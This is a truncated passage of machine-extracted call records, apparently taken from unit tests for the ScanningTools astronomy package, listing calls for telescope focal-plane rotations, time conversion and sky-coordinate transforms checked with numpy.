(['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (18654, 18736), True, 'from ScanningTools import ScanningTools as st\n'), ((18978, 19073), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate1', 'obs_time1'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC, DST\n =DST, day=day1)\n', (18991, 19073), True, 'from ScanningTools import ScanningTools as st\n'), ((19141, 19214), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time1', 'rpm1', 'zenith_distance', 'polarization_angle'], {}), '(time1, rpm1, zenith_distance, polarization_angle)\n', (19164, 19214), True, 'from ScanningTools import ScanningTools as st\n'), ((19297, 19392), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate2', 'obs_time2'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day2'}), '(LCT_start, LCD_start, sampling_rate2, obs_time2, UTC=UTC, DST\n =DST, day=day2)\n', (19310, 19392), True, 'from ScanningTools import ScanningTools as st\n'), ((19460, 19533), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time2', 'rpm2', 'zenith_distance', 'polarization_angle'], {}), '(time2, rpm2, zenith_distance, polarization_angle)\n', (19483, 19533), True, 'from ScanningTools import ScanningTools as st\n'), ((19639, 19683), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi1', 'theta1', 'psi1'], {}), '(phi1, theta1, psi1)\n', (19663, 19683), True, 'from ScanningTools import ScanningTools as st\n'), ((19702, 19746), 'ScanningTools.ScanningTools.euler_rotation_matrix', 'st.euler_rotation_matrix', (['phi2', 'theta2', 'psi2'], {}), '(phi2, theta2, psi2)\n', (19726, 19746), True, 'from ScanningTools import ScanningTools as st\n'), ((19771, 19859), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,\n cartesian=False)\n', (19790, 19859), True, 'from ScanningTools import ScanningTools as st\n'), ((19926, 20013), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(True)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,\n cartesian=True)\n', (19945, 20013), True, 'from ScanningTools import ScanningTools as st\n'), ((20080, 20168), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi2', 'theta2', 'psi2', 'x_fp', 'n_horns', 'time2'], {'n': 'n2', 'cartesian': '(False)'}), '(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,\n cartesian=False)\n', (20099, 20168), True, 'from ScanningTools import ScanningTools as st\n'), ((20235, 20322), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi2', 'theta2', 'psi2', 'x_fp', 'n_horns', 'time2'], {'n': 'n2', 'cartesian': '(True)'}), '(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,\n cartesian=True)\n', (20254, 20322), True, 'from ScanningTools import ScanningTools as st\n'), ((20510, 20566), 'ScanningTools.Quaternions.Quaternion.get_quaternion_from_euler', 'q.get_quaternion_from_euler', (['phi1[i]', 'theta1[i]', 'psi1[i]'], {}), '(phi1[i], theta1[i], psi1[i])\n', (20537, 20566), True, 'from ScanningTools.Quaternions import Quaternion as q\n'), ((20831, 20860), 'numpy.random.randint', 'np.random.randint', (['(0)', 'n_horns'], {}), '(0, n_horns)\n', (20848, 20860), True, 'import numpy as np\n'), ((20965, 21021), 'ScanningTools.Quaternions.Quaternion.get_quaternion_from_euler', 'q.get_quaternion_from_euler', (['phi2[j]', 'theta2[j]', 'psi2[j]'], {}), '(phi2[j], theta2[j], psi2[j])\n', (20992, 21021), True, 'from ScanningTools.Quaternions import Quaternion as q\n'), ((21572, 21668), 'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', (['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (21586, 21668), True, 'from ScanningTools import ScanningTools as st\n'), ((21848, 21940), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day)\n', (21861, 21940), True, 'from ScanningTools import ScanningTools as st\n'), ((22002, 22073), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time, rpm, zenith_distance, polarization_angle)\n', (22025, 22073), True, 'from ScanningTools import ScanningTools as st\n'), ((22088, 22175), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi', 'theta', 'psi', 'x_fp', 'n_horns', 'time'], {'n': 'None', 'cartesian': '(False)'}), '(phi, theta, psi, x_fp, n_horns, time, n=None, cartesian\n =False)\n', (22107, 22175), True, 'from ScanningTools import ScanningTools as st\n'), ((22186, 22271), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi', 'theta', 'psi', 'x_fp', 'n_horns', 'time'], {'n': 'n1', 'cartesian': '(False)'}), '(phi, theta, psi, x_fp, n_horns, time, n=n1, cartesian=False\n )\n', (22205, 22271), True, 'from ScanningTools import ScanningTools as st\n'), ((22282, 22367), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi', 'theta', 'psi', 'x_fp', 'n_horns', 'time'], {'n': 'n2', 'cartesian': '(False)'}), '(phi, theta, psi, x_fp, n_horns, time, n=n2, cartesian=False\n )\n', (22301, 22367), True, 'from ScanningTools import ScanningTools as st\n'), ((22381, 22412), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp'], {}), '(fpp)\n', (22407, 22412), True, 'from ScanningTools import ScanningTools as st\n'), ((22433, 22465), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp1'], {}), '(fpp1)\n', (22459, 22465), True, 'from ScanningTools import ScanningTools as st\n'), ((22486, 22518), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp2'], {}), '(fpp2)\n', (22512, 22518), True, 'from ScanningTools import ScanningTools as st\n'), ((22595, 22691), 'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', (['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (22609, 22691), True, 'from ScanningTools import ScanningTools as st\n'), ((22896, 22989), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day1)\n', (22909, 22989), True, 'from ScanningTools import ScanningTools as st\n'), ((23057, 23150), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day2'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day2)\n', (23070, 23150), True, 'from ScanningTools import ScanningTools as st\n'), ((23218, 23290), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time1', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time1, rpm, zenith_distance, polarization_angle)\n', (23241, 23290), True, 'from ScanningTools import ScanningTools as st\n'), ((23373, 23445), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time2', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time2, rpm, zenith_distance, polarization_angle)\n', (23396, 23445), True, 'from ScanningTools import ScanningTools as st\n'), ((23516, 23604), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,\n cartesian=False)\n', (23535, 23604), True, 'from ScanningTools import ScanningTools as st\n'), ((23616, 23704), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi2', 'theta2', 'psi2', 'x_fp', 'n_horns', 'time2'], {'n': 'n1', 'cartesian': '(False)'}), '(phi2, theta2, psi2, x_fp, n_horns, time2, n=n1,\n cartesian=False)\n', (23635, 23704), True, 'from ScanningTools import ScanningTools as st\n'), ((23716, 23804), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n2', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n2,\n cartesian=False)\n', (23735, 23804), True, 'from ScanningTools import ScanningTools as st\n'), ((23816, 23904), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi2', 'theta2', 'psi2', 'x_fp', 'n_horns', 'time2'], {'n': 'n2', 'cartesian': '(False)'}), '(phi2, theta2, psi2, x_fp, n_horns, time2, n=n2,\n cartesian=False)\n', (23835, 23904), True, 'from ScanningTools import ScanningTools as st\n'), ((23921, 23953), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp1'], {}), '(fpp1)\n', (23947, 23953), True, 'from ScanningTools import ScanningTools as st\n'), ((23974, 24006), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp2'], {}), '(fpp2)\n', (24000, 24006), True, 'from ScanningTools import ScanningTools as st\n'), ((24027, 24059), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp3'], {}), '(fpp3)\n', (24053, 24059), True, 'from ScanningTools import ScanningTools as st\n'), ((24080, 24112), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp4'], {}), '(fpp4)\n', (24106, 24112), True, 'from ScanningTools import ScanningTools as st\n'), ((24133, 24177), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'Alt1', 'Az1'], {}), '(JD1, loc, Alt1, Az1)\n', (24156, 24177), True, 'from ScanningTools import ScanningTools as st\n'), ((24221, 24265), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD2', 'loc', 'Alt2', 'Az2'], {}), '(JD2, loc, Alt2, Az2)\n', (24244, 24265), True, 'from ScanningTools import ScanningTools as st\n'), ((24310, 24354), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'Alt3', 'Az3'], {}), '(JD1, loc, Alt3, Az3)\n', (24333, 24354), True, 'from ScanningTools import ScanningTools as st\n'), ((24398, 24442), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD2', 'loc', 'Alt4', 'Az4'], {}), '(JD2, loc, Alt4, Az4)\n', (24421, 24442), True, 'from ScanningTools import ScanningTools as st\n'), ((24489, 24536), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1[0]', 'loc', 'Alt1', 'Az1'], {}), '(JD1[0], loc, Alt1, Az1)\n', (24512, 24536), True, 'from ScanningTools import ScanningTools as st\n'), ((26219, 26315), 'ScanningTools.ScanningTools.get_full_fp', 'st.get_full_fp', (['"""./ScanningTools/fp_data/fp_theta.txt"""', '"""./ScanningTools/fp_data/fp_phi.txt"""'], {}), "('./ScanningTools/fp_data/fp_theta.txt',\n './ScanningTools/fp_data/fp_phi.txt')\n", (26233, 26315), True, 'from ScanningTools import ScanningTools as st\n'), ((26505, 26598), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day1)\n', (26518, 26598), True, 'from ScanningTools import ScanningTools as st\n'), ((26666, 26738), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time1', 'rpm', 'zenith_distance', 'polarization_angle'], {}), '(time1, rpm, zenith_distance, polarization_angle)\n', (26689, 26738), True, 'from ScanningTools import ScanningTools as st\n'), ((26807, 26895), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n1,\n cartesian=False)\n', (26826, 26895), True, 'from ScanningTools import ScanningTools as st\n'), ((26907, 26995), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp', 'n_horns', 'time1'], {'n': 'n2', 'cartesian': '(False)'}), '(phi1, theta1, psi1, x_fp, n_horns, time1, n=n2,\n cartesian=False)\n', (26926, 26995), True, 'from ScanningTools import ScanningTools as st\n'), ((27012, 27044), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp1'], {}), '(fpp1)\n', (27038, 27044), True, 'from ScanningTools import ScanningTools as st\n'), ((27065, 27097), 'ScanningTools.ScanningTools.get_horizon_coordinates', 'st.get_horizon_coordinates', (['fpp3'], {}), '(fpp3)\n', (27091, 27097), True, 'from ScanningTools import ScanningTools as st\n'), ((27118, 27162), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'Alt1', 'Az1'], {}), '(JD1, loc, Alt1, Az1)\n', (27141, 27162), True, 'from ScanningTools import ScanningTools as st\n'), ((27206, 27250), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'Alt3', 'Az3'], {}), '(JD1, loc, Alt3, Az3)\n', (27229, 27250), True, 'from ScanningTools import ScanningTools as st\n'), ((27296, 27350), 'ScanningTools.ScanningTools.get_practical_icrs_coordinates', 'st.get_practical_icrs_coordinates', (['JD1', 'loc', 'Alt1', 'Az1'], {}), '(JD1, loc, Alt1, Az1)\n', (27329, 27350), True, 'from ScanningTools import ScanningTools as st\n'), ((27394, 27448), 'ScanningTools.ScanningTools.get_practical_icrs_coordinates', 'st.get_practical_icrs_coordinates', (['JD1', 'loc', 'Alt3', 'Az3'], {}), '(JD1, loc, Alt3, Az3)\n', (27427, 27448), True, 'from ScanningTools import ScanningTools as st\n'), ((27489, 27518), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['pointing_accuracy'], {}), '(pointing_accuracy)\n', (27499, 27518), True, 'from ScanningTools import ScanningTools as st\n'), ((28239, 28331), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=day)\n', (28252, 28331), True, 'from ScanningTools import ScanningTools as st\n'), ((28399, 28494), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate1', 'obs_time1'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'day1'}), '(LCT_start, LCD_start, sampling_rate1, obs_time1, UTC=UTC, DST\n =DST, day=day1)\n', (28412, 28494), True, 'from ScanningTools import ScanningTools as st\n'), ((28559, 28627), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time', 'rpm', 'zenith_distance', 'boresight_angle'], {}), '(time, rpm, zenith_distance, boresight_angle)\n', (28582, 28627), True, 'from ScanningTools import ScanningTools as st\n'), ((28657, 28728), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time1', 'rpm1', 'zenith_distance1', 'boresight_angle'], {}), '(time1, rpm1, zenith_distance1, boresight_angle)\n', (28680, 28728), True, 'from ScanningTools import ScanningTools as st\n'), ((28758, 28828), 'ScanningTools.ScanningTools.get_engine_rotations', 'st.get_engine_rotations', (['time1', 'rpm1', 'zenith_distance', 'boresight_angle'], {}), '(time1, rpm1, zenith_distance, boresight_angle)\n', (28781, 28828), True, 'from ScanningTools import ScanningTools as st\n'), ((28873, 28945), 'ScanningTools.ScanningTools.get_full_fp_polarization_angles', 'st.get_full_fp_polarization_angles', (['"""./ScanningTools/fp_data/fp_psi.txt"""'], {}), "('./ScanningTools/fp_data/fp_psi.txt')\n", (28907, 28945), True, 'from ScanningTools import ScanningTools as st\n'), ((29026, 29120), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi', 'theta', 'psi', 'x_fp_pol_versors', 'n_horns', 'time'], {'n': 'n', 'cartesian': '(True)'}), '(phi, theta, psi, x_fp_pol_versors, n_horns, time, n=n,\n cartesian=True)\n', (29045, 29120), True, 'from ScanningTools import ScanningTools as st\n'), ((29197, 29297), 'ScanningTools.ScanningTools.get_fp_rotations', 'st.get_fp_rotations', (['phi1', 'theta1', 'psi1', 'x_fp_pol_versors', 'n_horns', 'time1'], {'n': 'n1', 'cartesian': '(True)'}), '(phi1, theta1, psi1, x_fp_pol_versors, n_horns, time1, n\n =n1, cartesian=True)\n', (29216, 29297), True, 'from ScanningTools import ScanningTools as st\n'), ((29369, 29454), 'ScanningTools.ScanningTools.get_polarization_angles', 'st.get_polarization_angles', (['phi', 'theta', 'psi', 'x_fp_pol_versors', 'n_horns', 'time'], {'n': 'n'}), '(phi, theta, psi, x_fp_pol_versors, n_horns, time,\n n=n)\n', (29395, 29454), True, 'from ScanningTools import ScanningTools as st\n'), ((29525, 29615), 'ScanningTools.ScanningTools.get_polarization_angles', 'st.get_polarization_angles', (['phi1', 'theta1', 'psi1', 'x_fp_pol_versors', 'n_horns', 'time1'], {'n': 'n1'}), '(phi1, theta1, psi1, x_fp_pol_versors, n_horns,\n time1, n=n1)\n', (29551, 29615), True, 'from ScanningTools import ScanningTools as st\n'), ((29687, 29777), 'ScanningTools.ScanningTools.get_polarization_angles', 'st.get_polarization_angles', (['phi2', 'theta2', 'psi2', 'x_fp_pol_versors', 'n_horns', 'time1'], {'n': 'n1'}), '(phi2, theta2, psi2, x_fp_pol_versors, n_horns,\n time1, n=n1)\n', (29713, 29777), True, 'from ScanningTools import ScanningTools as st\n'), ((2514, 2533), 'numpy.radians', 'np.radians', (['ang0[0]'], {}), '(ang0[0])\n', (2524, 2533), True, 'import numpy as np\n'), ((3815, 3851), 'numpy.allclose', 'np.allclose', (['Jul_1_2013', '(2456474.442)'], {}), '(Jul_1_2013, 2456474.442)\n', (3826, 3851), True, 'import numpy as np\n'), ((3877, 3913), 'numpy.allclose', 'np.allclose', (['Jun_19_2009', '(2455002.25)'], {}), '(Jun_19_2009, 2455002.25)\n', (3888, 3913), True, 'import numpy as np\n'), ((3927, 3997), 'astropy.time.Time', 'Time', (["['2015-1-1 00:00:10', '2018-1-3 5:15:24.3', '1980-4-22 19:30:2']"], {}), "(['2015-1-1 00:00:10', '2018-1-3 5:15:24.3', '1980-4-22 19:30:2'])\n", (3931, 3997), False, 'from astropy.time import Time\n'), ((4304, 4321), 'numpy.allclose', 'np.allclose', (['t', 'T'], {}), '(t, T)\n', (4315, 4321), True, 'import numpy as np\n'), ((4956, 4984), 'ScanningTools.ScanningTools.get_nside_eff', 'st.get_nside_eff', (['fwhm_beam0'], {}), '(fwhm_beam0)\n', (4972, 4984), True, 'from ScanningTools import ScanningTools as st\n'), ((5017, 5045), 'ScanningTools.ScanningTools.get_nside_eff', 'st.get_nside_eff', (['fwhm_beam1'], {}), '(fwhm_beam1)\n', (5033, 5045), True, 'from ScanningTools import ScanningTools as st\n'), ((5077, 5105), 'ScanningTools.ScanningTools.get_nside_eff', 'st.get_nside_eff', (['fwhm_beam2'], {}), '(fwhm_beam2)\n', (5093, 5105), True, 'from ScanningTools import ScanningTools as st\n'), ((9017, 9110), 'ScanningTools.ScanningTools.get_timeJD', 'st.get_timeJD', (['LCT_start', 'LCD_start', 'sampling_rate', 'obs_time'], {'UTC': 'UTC', 'DST': 'DST', 'day': 'None'}), '(LCT_start, LCD_start, sampling_rate, obs_time, UTC=UTC, DST=\n DST, day=None)\n', (9030, 9110), True, 'from ScanningTools import ScanningTools as st\n'), ((17563, 17582), 'numpy.allclose', 'np.allclose', (['m3', 'M3'], {}), '(m3, M3)\n', (17574, 17582), True, 'import numpy as np\n'), ((18098, 18136), 'numpy.allclose', 'np.allclose', (['(theta[1:] - theta[:-1])', '(0)'], {}), '(theta[1:] - theta[:-1], 0)\n', (18109, 18136), True, 'import numpy as np\n'), ((18162, 18196), 'numpy.allclose', 'np.allclose', (['(psi[1:] - psi[:-1])', '(0)'], {}), '(psi[1:] - psi[:-1], 0)\n', (18173, 18196), True, 'import numpy as np\n'), ((24586, 24613), 'numpy.allclose', 'np.allclose', (['Dec1', 'Dec3[n1]'], {}), '(Dec1, Dec3[n1])\n', (24597, 24613), True, 'import numpy as np\n'), ((24639, 24664), 'numpy.allclose', 'np.allclose', (['Ra1', 'Ra3[n1]'], {}), '(Ra1, Ra3[n1])\n', (24650, 24664), True, 'import numpy as np\n'), ((24937, 24966), 'numpy.allclose', 'np.allclose', (['Dec1[0]', 'Dec5[0]'], {}), '(Dec1[0], Dec5[0])\n', (24948, 24966), True, 'import numpy as np\n'), ((24992, 25019), 'numpy.allclose', 'np.allclose', (['Ra1[0]', 'Ra5[0]'], {}), '(Ra1[0], Ra5[0])\n', (25003, 25019), True, 'import numpy as np\n'), ((25046, 25077), 'numpy.allclose', 'np.allclose', (['Dec1[1:]', 'Dec5[1:]'], {}), '(Dec1[1:], Dec5[1:])\n', (25057, 25077), True, 'import numpy as np\n'), ((25104, 25133), 'numpy.allclose', 'np.allclose', (['Ra1[1:]', 'Ra5[1:]'], {}), '(Ra1[1:], Ra5[1:])\n', (25115, 25133), True, 'import numpy as np\n'), ((25199, 25223), 'astropy.coordinates.SkyCoord.from_name', 'SkyCoord.from_name', (['name'], {}), '(name)\n', (25217, 25223), False, 'from astropy.coordinates import SkyCoord, AltAz\n'), ((25449, 25505), 'ScanningTools.ScanningTools.get_icrs_coordinates', 'st.get_icrs_coordinates', (['JD1', 'loc', 'object_Alt', 'object_Az'], {}), '(JD1, loc, object_Alt, object_Az)\n', (25472, 25505), True, 'from ScanningTools import ScanningTools as st\n'), ((30192, 30243), 'numpy.allclose', 'np.allclose', (['pol_ang_proj2[..., 0]', 'x_fp_pol_angles'], {}), '(pol_ang_proj2[..., 0], x_fp_pol_angles)\n', (30203, 30243), True, 'import numpy as np\n'), ((30281, 30329), 'numpy.allclose', 'np.allclose', (['pol_ang_proj', 'pol_ang_proj_expected'], {}), '(pol_ang_proj, pol_ang_proj_expected)\n', (30292, 30329), True, 'import numpy as np\n'), ((2367, 2425), 'numpy.array', 'np.array', (['[-10.76638889, 30.5875, -180.422222, 3.06805556]'], {}), '([-10.76638889, 30.5875, -180.422222, 3.06805556])\n', (2375, 2425), True, 'import numpy as np\n'), ((2673, 2740), 'numpy.array', 'np.array', (['[[1, 32, 47.706], [-0, 33, 36], [0, 20, 0], [-1, 0, 3.6]]'], {}), '([[1, 32, 47.706], [-0, 33, 36], [0, 20, 0], [-1, 0, 3.6]])\n', (2681, 2740), True, 'import numpy as np\n'), ((2834, 2859), 'numpy.array', 'np.array', (['[1, 32, 47.706]'], {}), '([1, 32, 47.706])\n', (2842, 2859), True, 'import numpy as np\n'), ((4023, 4090), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(0, 0, 10)', '(1, 1, 2015)'], {'UTC': '(0)', 'DST': '(0)'}), '((0, 0, 10), (1, 1, 2015), UTC=0, DST=0)\n', (4050, 4090), True, 'from ScanningTools import ScanningTools as st\n'), ((4114, 4184), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(5, 15, 24.3)', '(3, 1, 2018)'], {'UTC': '(0)', 'DST': '(0)'}), '((5, 15, 24.3), (3, 1, 2018), UTC=0, DST=0)\n', (4141, 4184), True, 'from ScanningTools import ScanningTools as st\n'), ((4208, 4277), 'ScanningTools.ScanningTools.LocalCivilTime2JulianDay', 'st.LocalCivilTime2JulianDay', (['(19, 30, 2)', '(22, 4, 1980)'], {'UTC': '(0)', 'DST': '(0)'}), '((19, 30, 2), (22, 4, 1980), UTC=0, DST=0)\n', (4235, 4277), True, 'from ScanningTools import ScanningTools as st\n'), ((4682, 4708), 'numpy.array', 'np.array', (['[11, 52, 46.843]'], {}), '([11, 52, 46.843])\n', (4690, 4708), True, 'import numpy as np\n'), ((5229, 5264), 'numpy.allclose', 'np.allclose', (['x_fp[i, 0]', 'x_fp[j, 0]'], {}), '(x_fp[i, 0], x_fp[j, 0])\n', (5240, 5264), True, 'import numpy as np\n'), ((5294, 5330), 'numpy.allclose', 'np.allclose', (['x_fp[i, 1]', '(-x_fp[j, 1])'], {}), '(x_fp[i, 1], -x_fp[j, 1])\n', (5305, 5330), True, 'import numpy as np\n'), ((5360, 5395), 'numpy.allclose', 'np.allclose', (['x_fp[i, 2]', 'x_fp[j, 2]'], {}), '(x_fp[i, 2], x_fp[j, 2])\n', (5371, 5395), True, 'import numpy as np\n'), ((5602, 5627), 'numpy.sum', 'np.sum', (['(x_fp ** 2)'], {'axis': '(1)'}), '(x_fp ** 2, axis=1)\n', (5608, 5627), True, 'import numpy as np\n'), ((6549, 6584), 'numpy.allclose', 'np.allclose', (['x_fp[i, 0]', 'x_fp[j, 0]'], {}), '(x_fp[i, 0], x_fp[j, 0])\n', (6560, 6584), True, 'import numpy as np\n'), ((6614, 6650), 'numpy.allclose', 'np.allclose', (['x_fp[i, 1]', '(-x_fp[j, 1])'], {}), '(x_fp[i, 1], -x_fp[j, 1])\n', (6625, 6650), True, 'import numpy as np\n'), ((6680, 6715), 'numpy.allclose', 'np.allclose', (['x_fp[i, 2]', 'x_fp[j, 2]'], {}), '(x_fp[i, 2], x_fp[j, 2])\n', (6691, 6715), True, 'import numpy as np\n'), ((6892, 6932), 'numpy.sum', 'np.sum', (['(polarization_versor ** 2)'], {'axis': '(1)'}), '(polarization_versor ** 2, axis=1)\n', (6898, 6932), True, 'import numpy as np\n'), ((8261, 8314), 'numpy.allclose', 'np.allclose', (['(time[1:] - time[0:-1])', '(1 / sampling_rate)'], {}), '(time[1:] - time[0:-1], 1 / sampling_rate)\n', (8272, 8314), True, 'import numpy as np\n'), ((8451, 8508), 'numpy.allclose', 'np.allclose', (['(t1 - t0).sec', '(1 / sampling_rate)'], {'rtol': '(0.001)'}), '((t1 - t0).sec, 1 / sampling_rate, rtol=0.001)\n', (8462, 8508), True, 'import numpy as np\n'), ((14255, 14328), 'numpy.sum', 'np.sum', (['(np.r_[True, phi[1:] > phi[:-1]] & np.r_[phi[:-1] > phi[1:], True])'], {}), '(np.r_[True, phi[1:] > phi[:-1]] & np.r_[phi[:-1] > phi[1:], True])\n', (14261, 14328), True, 'import numpy as np\n'), ((17423, 17458), 'numpy.repeat', 'np.repeat', (['M1[None, ...]', '(3)'], {'axis': '(0)'}), '(M1[None, ...], 3, axis=0)\n', (17432, 17458), True, 'import numpy as np\n'), ((17501, 17536), 'numpy.repeat', 'np.repeat', (['M2[None, ...]', '(3)'], {'axis': '(0)'}), '(M2[None, ...], 3, axis=0)\n', (17510, 17536), True, 'import numpy as np\n'), ((20444, 20472), 'numpy.dot', 'np.dot', (['fp_rot1[i]', 'x_fp[n1]'], {}), '(fp_rot1[i], x_fp[n1])\n', (20450, 20472), True, 'import numpy as np\n'), ((20897, 20924), 'numpy.dot', 'np.dot', (['fp_rot2[j]', 'x_fp[p]'], {}), '(fp_rot2[j], x_fp[p])\n', (20903, 20924), True, 'import numpy as np\n'), ((25534, 25573), 'numpy.allclose', 'np.allclose', (['object.dec.rad', 'object_Dec'], {}), '(object.dec.rad, object_Dec)\n', (25545, 25573), True, 'import numpy as np\n'), ((25603, 25640), 'numpy.allclose', 'np.allclose', (['object.ra.rad', 'object_Ra'], {}), '(object.ra.rad, object_Ra)\n', (25614, 25640), True, 'import numpy as np\n'), ((29886, 29938), 'numpy.linspace', 'np.linspace', (['(0)', 'np.pi', '(sampling_rate * obs_t / 2 + 1)'], {}), '(0, np.pi, sampling_rate * obs_t / 2 + 1)\n', (29897, 29938), True, 'import numpy as np\n'), ((30050, 30112), 'numpy.arctan2', 'np.arctan2', (['x_fp_pol_versors[..., 1]', 'x_fp_pol_versors[..., 0]'], {}), '(x_fp_pol_versors[..., 1], x_fp_pol_versors[..., 0])\n', (30060, 30112), True, 'import numpy as np\n'), ((30765, 30797), 'numpy.allclose', 